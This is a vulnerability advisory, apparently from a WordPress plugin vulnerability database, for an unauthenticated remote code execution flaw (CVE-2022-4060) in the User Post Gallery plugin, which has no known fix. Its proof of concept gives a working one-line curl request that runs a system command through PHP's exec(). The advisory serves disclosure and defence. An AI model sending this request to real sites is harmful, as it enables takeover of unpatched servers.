WordPress Plugin Vulnerabilities

User Post Gallery <= 2.19 - Unauthenticated RCE

Description

The plugin does not limit what callback functions can be called by users, making it possible to any visitors to run code on sites running it.

Proof of Concept

Invoke the following curl command to execute the "id" command via PHP's exec() function:

curl -i 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL'

Affects Plugins

Plugin icon
wp-upg
No known fix

References

CVE
CVE-2022-4060

Classification

Type
RCE
OWASP top 10
A1: Injection
CWE
CWE-94
CVSS
10.0 (critical)

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
8f982ebd-6fc5-452d-8280-42e027d01b1e

Timeline

Publicly Published
2022-12-23 (about 11 months ago)
Added
2022-12-23 (about 11 months ago)
Last Updated
2022-12-23 (about 11 months ago)

Other

Published
Title
Published
2023-01-25
Title
Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
Published
2014-08-01
Title
AREA53 <= 1.0.5 - File Upload Code Execution
Published
2022-05-18
Title
The School Management < 9.9.7 - Unauthenticated RCE via REST api
Published
2018-09-05
Title
Duplicator <= 1.2.40 - Unauthenticated Arbitrary Code Execution
Published
2019-02-19
Title
WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution